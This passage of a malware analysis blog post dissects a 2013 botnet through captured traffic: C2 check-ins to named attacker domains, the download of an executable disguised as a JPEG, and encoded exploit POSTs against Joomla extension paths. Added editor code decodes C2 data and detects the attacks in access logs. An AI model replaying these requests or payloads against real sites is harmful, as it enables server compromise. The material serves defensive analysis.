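    pids = {r["pid"] for r in report}
    return sorted((r["ppid"], r["pid"]) for r in report if r["ppid"] in pids)


if __name__ == "__main__":
    procs = parse_pslist(PSLIST_SAMPLE)
    rep = outbound_report(parse_netscan(NETSCAN_SAMPLE), procs)
    for r in rep:
        print(f'{r["name"]:<14} pid={r["pid"]:<5} conns={r["connections"]:<3} '
              f'chain={" -> ".join(r["chain"])}')
    print("parent/child both beaconing:", parent_child_both_connecting(rep))
```

<span style="font-family: inherit;">On real output, feed it the text of <i>vol.py -f mem.raw --profile=... netscan</i> and <i>pslist</i>; the join is what turns "a process is talking to port 80" into "a child of a freshly started service process is talking to five different hosts on port 80", which is the observation this section is built on.</span><br />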
<span style="font-family: inherit;"><span style="line-height: 1.428571em;">The pcap shows that </span><i style="line-height: 1.428571em;">mqtgsvc.exe</i><span style="line-height: 1.428571em;"> checks in with the domain </span><i style="font-weight: bold; line-height: 19.984375px;">www.wholists.org</i><span style="line-height: 1.428571em;">.</span></span><br />
<span style="font-family: inherit;"><br /></span>
<span style="line-height: 22.84375px;">The unpacked conhost.exe (MD5 </span>7958F73DAF4B84E3B00E008258EA2E7A<span style="line-height: 22.84375px;">) contains a <i>Base94</i> alphabet, which it uses to encode strings and communication requests alongside the more common <i>Base64</i>:</span><br />
<div style="background-color: #eff8fb; color: black; overflow: scroll; width: 780px;">
<span style="font-family: Courier New, Courier, monospace; font-size: small;"><b>!&quot;#$%&amp;'()*+,-./0123456789:;&lt;=&gt;?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{|}~</b></span></div>
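<span style="font-family: inherit;">That alphabet is exactly the 94 printable ASCII characters from '!' (0x21) to '~' (0x7E). As an added example (editor's code, not the malware's own routine, whose exact scheme the post does not describe), here is a Base94 codec over that alphabet using the usual big-number interpretation, plus a triage filter for candidate strings pulled out of the binary. Note that Base64 output is a subset of this alphabet, so the filter alone cannot tell the two encodings apart.</span><br />

```python
# Alphabet recovered from the unpacked conhost.exe: every printable ASCII
# character from '!' (0x21) to '~' (0x7E), 94 characters in all.
BASE94_ALPHABET = "".join(chr(c) for c in range(0x21, 0x7F))


def b94_encode(data: bytes) -> str:
    """Base-94 encode: treat the bytes as a big-endian integer and emit base-94
    digits, most significant first.  Each leading 0x00 byte becomes one leading
    '!' (the zero digit), the convention Base58 uses, so round trips are exact.
    This scheme is an assumption; the post only gives the alphabet."""
    n_zero = len(data) - len(data.lstrip(b"\x00"))
    num = int.from_bytes(data, "big")
    digits = []
    while num:
        num, r = divmod(num, 94)
        digits.append(BASE94_ALPHABET[r])
    return BASE94_ALPHABET[0] * n_zero + "".join(reversed(digits))


def b94_decode(text: str) -> bytes:
    """Inverse of b94_encode; raises ValueError on a character outside the alphabet."""
    n_zero = len(text) - len(text.lstrip(BASE94_ALPHABET[0]))
    num = 0
    for ch in text[n_zero:]:
        idx = BASE94_ALPHABET.find(ch)
        if idx < 0:
            raise ValueError(f"{ch!r} is not in the Base94 alphabet")
        num = num * 94 + idx
    body = num.to_bytes((num.bit_length() + 7) // 8, "big") if num else b""
    return b"\x00" * n_zero + body


def is_base94(s: str) -> bool:
    """True if every character is in the alphabet.  Base64 text passes too, so
    treat this as a triage filter for extracted strings, not a classifier."""
    return bool(s) and all(ch in BASE94_ALPHABET for ch in s)
```

<span style="font-family: inherit;">When testing a hypothesis like this against a real sample, run b94_decode over every string that passes is_base94 and fails a Base64 decode, and look for output that is printable or that starts with a known header; if the malware instead uses a chunked or offset variant, the decoded bytes will look random and the scheme needs adjusting from the disassembly.</span><br />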
1. The initial callback: the bot POSTs to 'www.wholists.org' on 95.163.104.69. Note the bare User-Agent of "-" and the base64-encoded parameters in both the query string and the body.
<br />
<br />
<div style="background-color: #eff8fb; color: black; height: 150px; overflow: scroll; scrollbar-base-color: #0489B1; width: 780px;">
POST /protocol.php?p=544355219&d=+ldPFacHQRWmAUMZtUAAHfFREUG1RAQdpWxDf6QFQhE= HTTP/1.1<br />
Content-Type: application/x-www-form-urlencoded<br />
Accept: */*<br />
Content-Length: 782<br />
User-Agent: -<br />
Host: www.wholists.org<br />
Connection: Keep-Alive<br />
Cache-Control: no-cache<br />
<br />
d=9kMAR6MOJUHhXRtO9B5McvZUG1PnQQsNrWQASedWQA2tcBNO53wCRf0TCWjYfz98wHw0dMRyIGXPfhtD4VwBT%2FVHLnf6XRZP5EAuY%2BZBAEX9RyRF4UAbT%2F1vIk%2F%2FWhFJ9kAuZetDHk%2FhVgB8wUYcXbVWAlL0Ak938kEcSf1UXx7BVhVJ4EcAWb4NJVL6RxcSvg0xQf1HPVD2XVJb23g%2Bbc9gPWbHZDNy1m8%2FSfBBHVP8VQZ8xFocRPxEAXzQRgBS9l0GdvZBAUn8XS5y5l0PBvZDAEehDiVB4V0bTvQeTHL2VBtT50ELDa1kAEnnVkANrXATTud8AkX9Ewlo2HAnfMB8NHTEciBlz34bQ%2BFcAU%2F1Ry53%2Bl0WT%2BRALmPmQQBF%2FUckReFAG0%2F9byJP%2F1oRSfZALmXrQx5P4VYAfMFGHF21VgJS9ABPd%2FJBHEn9VF8ewVYVSeBHAFm%2BDSVS%2BkcXEr4NMUH9Rz1Q9l1SW9t4J3PPHTZl1XInbMdvIU%2F1RwVB4VYubfpQAE%2FgXBRUz2QbTvdcBVPPcAdS4VYcVMVWAFP6XBx8w1weSfBaF1PPdgpQ%2F1wAReFvIFX9TlRF40EVFK5kE1L9WhxHvg0gRfRaAVThSl8exEEbVPYBXx7QUhxU3EMXTrNIOmvGYC4O13Y0YcZ%2FJnzAXBRU5FIARc9%2BG0PhXAFP9Ucud%2FpdFk%2FkQC5j5kEARf1HJEXhQBtP%2FW8gVf1O<br />
<br />
HTTP/1.1 200 OK<br />
Server: nginx<br />
Date: Mon, 27 May 2013 03:27:10 GMT<br />
Content-Type: application/octet-stream<br />
Transfer-Encoding: chunked<br />
Connection: keep-alive<br />
Keep-Alive: timeout=20<br />
<br />
60<br />
..F...@..>xH.G.....E.G.I._\S.\.E.R.P...R.....\.H..\J.TRC.].O.G\E.VR...@..A.N.@.A..]......GC..C.*</div>
<span style="font-family: inherit;"><span style="line-height: 22.84375px;"><br /></span></span>
<span style="font-family: inherit;"><span style="line-height: 22.84375px;">2. </span></span><span style="line-height: 22.84375px;">www.wholists.org directs the infected host to 'gettrial.store-apps.org', from which it requests 'conh11.jpg'. Despite the name, the file is a Win32 executable rather than a JPEG; its MD5 is 7958f73daf4b84e3b00e008258ea2e7a (the conhost.exe sample discussed above), and it is well detected on VirusTotal.</span><br />
<div style="background-color: #eff8fb; color: black; height: 200px; overflow: scroll; scrollbar-base-color: #0489B1; width: 780px;">
<span style="line-height: 22.84375px;"><span style="font-family: inherit;">GET /d/conh11.jpg HTTP/1.1</span></span><br />
<span style="line-height: 22.84375px;"><span style="font-family: inherit;">User-Agent: -</span></span><br />
<span style="line-height: 22.84375px;"><span style="font-family: inherit;">Host: gettrial.store-apps.org</span></span><br />
<span style="line-height: 22.84375px;"><span style="font-family: inherit;">Cache-Control: no-cache</span></span><br />
<span style="line-height: 22.84375px;"><span style="font-family: inherit;"><br /></span></span>
<span style="line-height: 22.84375px;"><span style="font-family: inherit;">HTTP/1.1 200 OK</span></span><br />
<span style="line-height: 22.84375px;"><span style="font-family: inherit;">Server: nginx</span></span><br />
<span style="line-height: 22.84375px;"><span style="font-family: inherit;">Date: Mon, 27 May 2013 03:27:11 GMT</span></span><br />
<span style="line-height: 22.84375px;"><span style="font-family: inherit;">Content-Type: application/octet-stream</span></span><br />
<span style="line-height: 22.84375px;"><span style="font-family: inherit;">Content-Length: 98304</span></span><br />
<span style="line-height: 22.84375px;"><span style="font-family: inherit;">Last-Modified: Tue, 14 May 2013 20:21:33 GMT</span></span><br />
<span style="line-height: 22.84375px;"><span style="font-family: inherit;">Connection: keep-alive</span></span><br />
<span style="line-height: 22.84375px;"><span style="font-family: inherit;">Keep-Alive: timeout=20</span></span><br />
<span style="line-height: 22.84375px;"><span style="font-family: inherit;">ETag: "51929ccd-18000"</span></span><br />
<span style="line-height: 22.84375px;"><span style="font-family: inherit;">Accept-Ranges: bytes</span></span></div>
<br />
<span style="font-family: inherit;"><span style="line-height: 22.84375px;">3. </span></span><span style="line-height: 22.84375px;">Next, the bot sends a GET for <b>"/img/seek.cgi?lin=100&amp;db=ndb"</b> to <b>"seek4.run-stat.org"</b> on 46.165.230.185, followed by a GET for ae1.php from bt.ads-runner.org on 208.115.109.53. The ae1.php response is a base64 blob:</span></div>
<div style="border: 0px; margin: 0px; padding: 0px;">
<div style="background-color: #eff8fb; color: black; height: 200px; overflow: scroll; scrollbar-base-color: #0489B1; width: 780px;">
<span style="line-height: 22.84375px;">GET /ae1.php HTTP/1.1</span><br />
<span style="line-height: 22.84375px;">Accept: */*</span><br />
<span style="line-height: 22.84375px;">User-Agent: Mozilla/5.0</span><br />
<span style="line-height: 22.84375px;">Host: bt.ads-runner.org</span><br />
<span style="line-height: 22.84375px;">Connection: Keep-Alive</span><br />
<span style="line-height: 22.84375px;">Cache-Control: no-cache</span><br />
<span style="line-height: 22.84375px;"><br /></span>
<span style="line-height: 22.84375px;">HTTP/1.1 200 OK</span><br />
<span style="line-height: 22.84375px;">Server: nginx</span><br />
<span style="line-height: 22.84375px;">Date: Mon, 27 May 2013 03:27:15 GMT</span><br />
<span style="line-height: 22.84375px;">Content-Type: text/plain; charset=iso-8859-1</span><br />
<span style="line-height: 22.84375px;">Content-Length: 373</span><br />
<span style="line-height: 22.84375px;">Connection: close</span><br />
<span style="line-height: 22.84375px;">Vary: Accept-Encoding</span><br />
<span style="line-height: 22.84375px;">Last-Modified: Mon, 27 May 2013 03:27:15 GMT</span><br />
<span style="line-height: 22.84375px;">Accept-Ranges: bytes</span><br />
<span style="line-height: 22.84375px;">PldRR1A8aG1ma11xaWtsbGdwPi1XUUdQPAg+TENPRzwgSG1mayJRaWtsbGdwID4tTENPRzwIPlFX</span><br />
<span style="line-height: 22.84375px;">QEg8SmciamcuIiJOY3ZrbCJhbWdmIm93ZGRma3RnZiIkImR3YWlnZiJmbWVle3F2e25nImBnZiJx</span><br />
<span style="line-height: 22.84375px;">Z3o+LVFXQEg8Igg+UUBNRls8CD5ma3Q8PmMianBnZD8ganZ2cjgtLXV1dSxlYHRjZXBrYW1uYyxh</span><br />
<span style="line-height: 22.84375px;">bW8tYW1vcm1sZ2x2cS1hbW9dcm1ubi1jdUEzeixqdm9uIDxOY3ZrbCJhbWdmIm93ZGRma3RnZiIk</span><br />
<span style="line-height: 22.84375px;">ImR3YWlnZiJmbWVle3F2e25nImBnZiJxZ3o+LWM8Pi1ma3Q8CD4tUUBNRls8CA==</span><br />
<div style="font-family: inherit; line-height: 22.84375px;">
<br /></div>
</div>
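<span style="font-family: inherit;">The base64 body above does not decode to readable text on its own. As an added example (editor's analysis, not part of the original post), the following Python decodes the first 76-character line and brute-forces a single-byte XOR key by scoring each candidate for printable text and tag-like markup. The recovered key is 0x02, and the plaintext is a tag-delimited template carrying a USER and a NAME field (the later lines, omitted here, decode to spam subject and body text). The parameters the bot later POSTs to the compromised sites begin with the same base64 prefix, PldRR1A8, so the same decoding applies there.</span><br />

```python
import base64

# First 76-character line of the base64 body returned by bt.ads-runner.org/ae1.php,
# copied from the capture above.  The remaining lines are spam text and omitted.
CAPTURED_LINE = "PldRR1A8aG1ma11xaWtsbGdwPi1XUUdQPAg+TENPRzwgSG1mayJRaWtsbGdwID4tTENPRzwIPlFX"


def plausibility(buf: bytes) -> int:
    """Score a candidate plaintext: reward printable ASCII, punish control
    bytes, and reward the tag-close ("</") and tag-boundary (">" newline "<")
    sequences of a tag-based template.  Higher is better."""
    printable = sum(1 for b in buf if 0x20 <= b < 0x7F or b in b"\t\n\r")
    controls = len(buf) - printable
    tags = buf.count(b"</") + buf.count(b">\n<")
    return printable - 5 * controls + 20 * tags


def recover_xor_key(data: bytes):
    """Try all 256 single-byte keys; return (key, plaintext) with the best score."""
    best_key = max(range(256), key=lambda k: plausibility(bytes(b ^ k for b in data)))
    return best_key, bytes(b ^ best_key for b in data)


def decode_ae1_line(b64_line: str):
    """base64 -> XOR key recovery -> text.  Returns (key, decoded text)."""
    raw = base64.b64decode(b64_line)
    key, plain = recover_xor_key(raw)
    return key, plain.decode("ascii", errors="replace")


def decode_with_key(b64_text: str, key: int) -> str:
    """Once the key is known, decode a whole body (line breaks and spaces stripped)."""
    raw = base64.b64decode("".join(b64_text.split()))
    return bytes(b ^ key for b in raw).decode("ascii", errors="replace")


if __name__ == "__main__":
    key, text = decode_ae1_line(CAPTURED_LINE)
    print(f"key=0x{key:02x}")
    print(text)
```

<span style="font-family: inherit;">The scoring is deliberately biased toward markup: with only a printability test, key 0x01 ties key 0x02 on this input because XOR-ing printable ASCII with 1 keeps it printable; the bonus for "</" breaks the tie decisively. Feed decode_with_key the full five-line body to see the whole template.</span><br />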
<span style="line-height: 22.84375px;">Several PHP scripts were observed being downloaded from 46.165.230.185. They form the arsenal of scripts, one or more of which is injected into a vulnerable server. <a href="http://www.deependresearch.org/p/file-sm14e.html">We link here to the PHP scripts we saw in use by this malware.</a> The presence of any of these scripts on a CMS web server is a good indication of compromise.</span><br />
<br />
<span style="line-height: 22.84375px;">4. The next conversation the bot initiated was of particular interest. The bot sent repeated requests for "ggu.php" to 'fw.point-up.org' on 85.143.166.221, and each response carried a single URL pointing at a WordPress or Joomla site:</span><br />
<div style="background-color: #eff8fb; color: black; height: 200px; overflow: scroll; scrollbar-base-color: #0489B1; width: 780px;">
<span style="line-height: 22.84375px;">GET /ggu.php HTTP/1.1</span><br />
<span style="line-height: 22.84375px;">Accept: */*</span><br />
<span style="line-height: 22.84375px;">User-Agent: Mozilla/5.0</span><br />
<span style="line-height: 22.84375px;">Host: fw.point-up.org</span><br />
<span style="line-height: 22.84375px;">Connection: Keep-Alive</span><br />
<span style="line-height: 22.84375px;">Cache-Control: no-cache</span><br />
<span style="line-height: 22.84375px;"><br /></span>
<span style="line-height: 22.84375px;">HTTP/1.1 200 OK</span><br />
<span style="line-height: 22.84375px;">Server: nginx</span><br />
<span style="line-height: 22.84375px;">Date: Mon, 27 May 2013 03:27:16 GMT</span><br />
<span style="line-height: 22.84375px;">Content-Type: text/html</span><br />
<span style="line-height: 22.84375px;">Transfer-Encoding: chunked</span><br />
<span style="line-height: 22.84375px;">Connection: keep-alive</span><br />
<span style="line-height: 22.84375px;">Keep-Alive: timeout=20</span><br />
<span style="line-height: 22.84375px;">Vary: Accept-Encoding</span><br />
<span style="line-height: 22.84375px;">41</span><br />
<span style="line-height: 22.84375px;">http://redacted.com/English/data/cache/diggCache/f7/19/18/page.php</span><br />
<span style="line-height: 22.84375px;">0</span><br />
<div>
<br /></div>
</div>
</div>
</div>
<span style="font-family: inherit; line-height: 19.984375px;"><br /></span>
<span style="font-family: inherit; line-height: 19.984375px;">We scripted a fetch of this file every few seconds and have since collected thousands of URLs that will be targeted for exploitation. After receiving a target URL from </span><span style="font-family: inherit; line-height: 19.984375px;"><b style="font-style: italic;">fw.point-up.org</b>, the bot attempts exploits with various payloads. By dumping the VAD of the 'conhost.exe' process, we found references to CMS module paths with previously reported vulnerabilities. For example:</span><br />
<blockquote class="tr_bq">
<div class="separator" style="clear: both; text-align: center;">
</div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj-rDCGiwySicNxD10tl8BOxLI8FZ0QKpEdIznyGHzzs-aax_OcsE_aLX2sqMz_AyF9c8ygY0Or3Jze-lyDSp7w2xssgHpcukdautAvx80aBCv3q1BjqrWpjjgA_NgDbRFrhpnAxCIvFgY/s1600/victims.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><span style="font-family: inherit;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj-rDCGiwySicNxD10tl8BOxLI8FZ0QKpEdIznyGHzzs-aax_OcsE_aLX2sqMz_AyF9c8ygY0Or3Jze-lyDSp7w2xssgHpcukdautAvx80aBCv3q1BjqrWpjjgA_NgDbRFrhpnAxCIvFgY/s640/victims.png" height="497" sss="" width="640" /></span></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><span style="font-family: inherit; font-size: small;">List of URLs from fw.point-up.org</span></td></tr>
</tbody></table>
<span style="font-family: inherit; line-height: 19.984375px;">The targeted site's response varies with the success or failure of the attempt. Examination of the traffic indicates a much larger proportion of apparently successful exploits than failures. The following are examples of three different responses that were seen.</span></blockquote>
1. OKe807f1fcf82d132f9bb018ca6738a19f+0 -- "OK" followed by the MD5 hash of the string 1234567890 (e807f1fcf82d132f9bb018ca6738a19f) and "+0". This is the success case.<br />
<div style="background-color: #eff8fb; color: black; height: 150px; overflow: scroll; scrollbar-base-color: #0489B1; width: 780px;">
POST /fincaxxxxxxoja/administrator/components/com_akeeba/assets/javascript.php HTTP/1.1<br />
Accept: */*<br />
Content-Type: application/x-www-form-urlencoded<br />
User-Agent: Mozilla/5.0<br />
Host: [redacted].com<br />
Content-Length: 439<br />
Connection: Keep-Alive<br />
Cache-Control: no-cache<br />
<br />
lQSWlN=UGN0azk5cGN0a3FwZ2dsa3RjcWNsQntvY2tuLGFtbw==&eveKxt=JbvnFDiuGIh&moYkYn=b3ZjNSxjbzIse2NqbW1mbHEsbGd2&dsmIC=PldRR1A8a3BvY110Y25nbHh3Z25jPi1XUUdQPAg%2BTENPRzwgS3BvYyJUY25nbHh3Z25jID4tTENP RzwIPlFXQEg8RHU4IiJEcGdxaiJhd29kY2FnZiJqZ3BnPi1RV0BIPCIIPlFATUZbPAg%2BZmt0PD5j ImpwZ2Q%2FIGp2dnI4LS1wd3hlY3BkbyxsZ3YtdXIvYW1sdmdsdi12amdvZ3EtdnVnbHZ7dmdsLWNO M0gsanZvbiA8RHBncWoiYXdvZGNhZ2YiamdwZz4tYzw%2BLWZrdDwIPi1RQE1GWzwI &jwIm=YVdRaWRBe0NbVQ== <br />
<br />
HTTP/1.1 200 OK<br />
Date: Mon, 27 May 2013 03:27:21 GMT<br />
Server: Apache<br />
X-Powered-By: PHP/5.2.14<br />
Connection: close<br />
Transfer-Encoding: chunked<br />
Content-Type: text/html<br />
<br />
OKe807f1fcf82d132f9bb018ca6738a19f+0</div>
<br />
2. Not Allowed -- the request was blocked. The 406 below is generated by mod_security on the target, so it shows that the payload was filtered, not that the host is free of the vulnerability.<br />
<div style="background-color: #eff8fb; color: black; height: 150px; overflow: scroll; scrollbar-base-color: #0489B1; width: 780px;">
POST /plugins/editors/jce/libraries/classes/json/defines.php HTTP/1.1<br />
Accept: */*<br />
Content-Type: application/x-www-form-urlencoded<br />
User-Agent: Mozilla/5.0<br />
Host: www.[redacted].org<br />
Content-Length: 506<br />
Connection: Keep-Alive<br />
Cache-Control: no-cache<br />
<br />
lFgaqq=UGN0azk5cGN0a3FqY0J7Y2ptbSxrdg==&eaMKYX=QMMIJINvf&mQaLuv=b3ovZ3csb2NrbixjbzIse2NqbW1mbHEsbGd2&dSgdS=PldRR1A8Y2xjcXZjcWtjXWVrbmBncHY%2BLVdRR1A8CD5MQ09HPCBDbGNxdmNxa2MiRWtuYGdwdiA%2B LUxDT0c8CD5RV0BIPER1OCIiQ2ZtcGNgbmcidmdnbCJyZ2drbGUiY2xmInFqbXVncGtsZSJrbCJ2 amciYGNqdnBtbW8%2BLVFXQEg8Igg%2BUUBNRls8CD5ma3Q8PmMianBnZD8ganZ2cjgtLW9lL2RnanBj bnZtcGQsYWota29jZWdxLWNzUWllLGp2b24gPENmbXBjYG5nInZnZ2wicmdna2xlImNsZiJxam11 Z3BrbGUia2widmpnImBjanZwbW1vPi1jPD4tZmt0PAg%2BLVFATUZbPAg%3D &cDXH=cE1TQHtFZmtoQUlR <br />
<br />
HTTP/1.1 406 Not Acceptable<br />
Date: Mon, 27 May 2013 03:27:21 GMT<br />
Server: Apache<br />
Content-Length: 226<br />
Keep-Alive: timeout=5, max=75<br />
Connection: Keep-Alive<br />
Content-Type: text/html; charset=iso-8859-1<br />
<br />
&lt;head&gt;&lt;title&gt;Not Acceptable!&lt;/title&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Acceptable!&lt;/h1&gt;An appropriate representation of the requested resource could not be found on this server. This error was generated by Mod_Security.&lt;/body&gt;</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh4NYaXIj9a345xtUZ5PxhMUXXiOSuFT5hXWbmjEqheqUgLqZSfLS9zHmHIBT1rUtfbB0dzkmpS9gaWMCH5MBK7D-vM4UBesk0u1lYI9GbblmR6b9ARh4u84ZZHREPEXza2oWexexJv9gYm/s1600/code1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh4NYaXIj9a345xtUZ5PxhMUXXiOSuFT5hXWbmjEqheqUgLqZSfLS9zHmHIBT1rUtfbB0dzkmpS9gaWMCH5MBK7D-vM4UBesk0u1lYI9GbblmR6b9ARh4u84ZZHREPEXza2oWexexJv9gYm/s1600/code1.png" height="40" width="640" /></a></div>
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEic824e68TIhPmSD_sxmWq5RMzFrqoclYO7xUShEeclq8sMUjpv6Ha0L7C9obWZbYeG9GdpW-1K0atTIWGuFXQ4w4Utx9Kp8mCQ-aH2EeLabTHE9O4PqYiEY9-_SqehUM6LsY0LsPZCusco/s1600/code.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEic824e68TIhPmSD_sxmWq5RMzFrqoclYO7xUShEeclq8sMUjpv6Ha0L7C9obWZbYeG9GdpW-1K0atTIWGuFXQ4w4Utx9Kp8mCQ-aH2EeLabTHE9O4PqYiEY9-_SqehUM6LsY0LsPZCusco/s1600/code.png" height="85" width="640" /></a></div>
<br />
<br />
<br />
3. A 200 OK with a 354-byte text/html body (the third response type):<br />
<div style="background-color: #eff8fb; color: black; height: 150px; overflow: scroll; scrollbar-base-color: #0489B1; width: 780px;">
POST /plugins/editors/jce/tiny_mce/plugins/advcode/img/test.php HTTP/1.1<br />
Accept: */*<br />
Content-Type: application/x-www-form-urlencoded<br />
User-Agent: Mozilla/5.0<br />
Host: www.[redacted].com<br />
Content-Length: 506<br />
Connection: Keep-Alive<br />
Cache-Control: no-cache<br />
<br />
lFgaqq=UGN7OTlwY3tgZ2xgbUJlb2NrbixhbW8=&eaMKYX=QMMIJINvf&mQaLuv=ZW9ja24vcW92ci9rbCxuLGVtbWVuZyxhbW8=&dSgdS=PldRR1A8Y2xjcXZjcWtjXWVrbmBncHY%2BLVdRR1A8CD5MQ09HPCBDbGNxdmNxa2MiRWtuYGdwdiA%2B LUxDT0c8CD5RV0BIPER1OCIiQ2ZtcGNgbmcidmdnbCJyZ2drbGUiY2xmInFqbXVncGtsZSJrbCJ2 amciYGNqdnBtbW8%2BLVFXQEg8Igg%2BUUBNRls8CD5ma3Q8PmMianBnZD8ganZ2cjgtLW9lL2RnanBj bnZtcGQsYWota29jZWdxLWNzUWllLGp2b24gPENmbXBjYG5nInZnZ2wicmdna2xlImNsZiJxam11 Z3BrbGUia2widmpnImBjanZwbW1vPi1jPD4tZmt0PAg%2BLVFATUZbPAg%3D &cDXH=cE1TQHtFZmtoQUlR <br />
<br />
HTTP/1.1 200 OK<br />
Date: Mon, 27 May 2013 03:27:20 GMT<br />
Server: Apache/2.2.9 (Debian) PHP/5.3.3-7+squeeze14 with Suhosin-Patch mod_python/3.3.1 Python/2.5.2<br />
X-Powered-By: PHP/5.3.3-7+squeeze14<br />
Vary: Accept-Encoding<br />
Content-Length: 354<br />
Content-Type: text/html; charset=ISO-8859-1<br />
Keep-Alive: timeout=15, max=100<br />
Connection: Keep-Alive</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh8AZj3ksilqKdQN11wvaVmYe-bMKfRubWm3ZasAetKzQ-rj9ylb6JB35FcPeRbjN6tWlFYer6XS8xc750fjnAJs8RMMwYYJ7GARBxPR-nA2WC1QoTFVn4cSgeB54l57e3YBNLY-gXojBQa/s1600/code3.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh8AZj3ksilqKdQN11wvaVmYe-bMKfRubWm3ZasAetKzQ-rj9ylb6JB35FcPeRbjN6tWlFYer6XS8xc750fjnAJs8RMMwYYJ7GARBxPR-nA2WC1QoTFVn4cSgeB54l57e3YBNLY-gXojBQa/s1600/code3.png" height="45" width="640" /></a></div>
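<span style="font-family: inherit;">For the web-server side, as an added example (editor's code, not the post's), the following Python flags this exploitation pattern in an Apache or nginx combined-format access log using only indicators taken from the captures above: POSTs to the three Joomla extension paths, the bare 'Mozilla/5.0' User-Agent, and the 200 versus 406 status split. It also checks a response body for the "OK" plus md5("1234567890") marker of response type 1. The log lines are constructed; the client IPs, timestamps and the innocent requests are placeholders.</span><br />

```python
import hashlib
import re

# Extension paths the bot POSTed to in the captures above (Joomla com_akeeba
# and the JCE editor).  Matched as path suffixes so any install prefix works.
TARGET_PATHS = (
    "/administrator/components/com_akeeba/assets/javascript.php",
    "/plugins/editors/jce/libraries/classes/json/defines.php",
    "/plugins/editors/jce/tiny_mce/plugins/advcode/img/test.php",
)
BOT_UA = "Mozilla/5.0"  # the bare User-Agent string the bot sends
# Reply from a successfully injected script: "OK" + md5("1234567890") (+ "+0")
SUCCESS_MARKER = "OK" + hashlib.md5(b"1234567890").hexdigest()

# Apache/nginx "combined" log format.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)

# CONSTRUCTED log lines.  The three POST lines mirror the captures; the
# client IPs, timestamps and the two innocent requests are placeholders.
SAMPLE_LOG = """\
203.0.113.10 - - [27/May/2013:03:27:19 +0000] "GET /index.php?option=com_content&view=article&id=7 HTTP/1.1" 200 5123 "-" "Mozilla/5.0 (Windows NT 6.1; rv:21.0) Gecko/20100101 Firefox/21.0"
198.51.100.7 - - [27/May/2013:03:27:21 +0000] "POST /site/administrator/components/com_akeeba/assets/javascript.php HTTP/1.1" 200 37 "-" "Mozilla/5.0"
198.51.100.7 - - [27/May/2013:03:27:21 +0000] "POST /plugins/editors/jce/libraries/classes/json/defines.php HTTP/1.1" 406 226 "-" "Mozilla/5.0"
198.51.100.7 - - [27/May/2013:03:27:20 +0000] "POST /plugins/editors/jce/tiny_mce/plugins/advcode/img/test.php HTTP/1.1" 200 354 "-" "Mozilla/5.0"
203.0.113.11 - - [27/May/2013:03:28:02 +0000] "GET /plugins/editors/jce/tiny_mce/plugins/advcode/img/test.php HTTP/1.1" 404 213 "-" "Mozilla/5.0 (compatible; bingbot/2.0)"
"""


def classify(line: str):
    """Return a finding for a request to one of TARGET_PATHS, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    path = m["target"].split("?", 1)[0]
    if not any(path.endswith(t) for t in TARGET_PATHS):
        return None
    status = int(m["status"])
    if m["method"] == "POST" and status == 200:
        verdict = "possible-success"   # response type 1 rides on a 200
    elif status == 406:
        verdict = "blocked-by-waf"     # the mod_security reply of response type 2
    elif m["method"] == "POST":
        verdict = "attempt"
    else:
        verdict = "probe"              # e.g. a crawler hitting a dropped file
    return {"ip": m["ip"], "ts": m["ts"], "method": m["method"], "path": path,
            "status": status, "bare_bot_ua": m["ua"] == BOT_UA, "verdict": verdict}


def scan_log(text: str):
    """All findings in a log, in file order."""
    return [f for f in (classify(line) for line in text.splitlines()) if f]


def is_success_reply(body: str) -> bool:
    """True for a body like response example 1: 'OK' + md5('1234567890'),
    optionally followed by '+<n>'."""
    return body.startswith(SUCCESS_MARKER)


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f'{f["ts"]} {f["ip"]:<14} {f["method"]:<4} {f["status"]} '
              f'{f["verdict"]:<17} bot-ua={f["bare_bot_ua"]} {f["path"]}')
    print("success marker:", SUCCESS_MARKER)
```

<span style="font-family: inherit;">A "possible-success" hit against a PHP file under an images or json directory is worth treating as a compromise until the file has been pulled and read; the access log only tells you the request was answered with a 200, while the "OK" plus hash marker in the body (visible in a full-capture proxy or in PHP's own logging, not in the access log) is the stronger signal.</span><br />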
<h2 style="text-align: left;">
<span style="font-family: inherit; line-height: 19.984375px;"><b><br /></b></span></h2>
<h2 style="text-align: left;">
<span style="font-family: inherit; line-height: 19.984375px;"><b><br /></b></span></h2>
<h2 style="text-align: left;">
<span style="font-family: inherit; line-height: 19.984375px;"><b>Hosting Infrastructure </b></span></h2>
<span style="font-family: inherit; line-height: 19.984375px;">The following is a list of the domains and IP addresses that were seen as part of this botnet infrastructure.</span><br />
<span style="font-family: inherit;"><span style="line-height: 19.984375px;"><br />
</span> </span><br />
<table border="1" cellpadding="10"><tbody>
<tr> <th><span style="font-family: inherit;">Domain</span></th> <th><span style="font-family: inherit;">IP Address</span></th> <th><span style="font-family: inherit;">ASN</span></th> <th><span style="font-family: inherit;">Network Name</span></th> </tr>
